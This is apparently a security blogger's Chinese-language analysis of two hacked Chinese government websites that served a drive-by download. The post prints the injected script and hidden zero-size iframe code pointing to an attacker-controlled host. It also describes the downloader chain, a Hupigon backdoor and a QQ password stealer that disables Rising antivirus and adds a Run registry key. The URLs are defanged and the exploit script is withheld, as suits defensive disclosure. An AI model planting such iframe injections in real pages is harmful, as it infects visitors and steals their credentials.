打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e。
第一个网站 hxxp://www.jing***.gov.cn的首页加入代码:
-------- <TR><script language=javascript src=bbs.js></script> <TD vAlign=top align=right width="48%"> --------
bbs.js的内容为:
-------- document.write("<iframe src=hxxp://wzxqy.chao***kuai.com/***1***23/index.htm width=0 height=0></iframe>") --------
hxxp://wzxqy.chao***kuai.com/***1***23/index.htm 的内容为JavaScript脚本,由于其中包含了攻击者所属组织和QQ号,所里不公开具体内容。
该脚本利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://wzxqy.chao***kuai.com/***1***23/123.exe, 保存为 IE临时文件夹中的 winlogin.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。(这与 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的维金/Viking蠕虫 中第二段脚本程序相似)
123.exe 下载两个文件:
hxxp://wzxqy***01.vip***6.25idc.cn/1***/888.exe (Kaspersky 报为 Backdoor.Win32.Hupigon.byq)
hxxp://wzxqy***01.vip***6.25idc.cn/1***/777.exe (Kaspersky 报为 Trojan-PSW.Win32.QQRob.hf)
777.exe 会:
1、终止瑞星实时监控中心,强行关闭瑞星杀毒软件窗口,删除瑞星在注册表中的开机启动项,如RavTask
2、把自己复制为%windir%/system32/NTdHcP.exe,并运行
3、修改注册表,在 [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下创建键"NTdhcp",其值为:"C:/WINDOWS/System32/NTdhcp.exe"
(endurer注:c:/windows是Windows系统文件夹路径,在不同的电脑中可能不同)
4、终止QQ进程,盗取QQ密码
第二个网站 hxxp://www.hj***.gov.cn的首页末被直接加入代码:
-------- <iframe src="hxxp://wzxqy.chao***kuai.Qcom/***1***23/index.htm" width="0" height="0" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe> --------
经分析发现两个网站在同一个服务器上,因此被加入同一恶意代码也就不足为奇了。
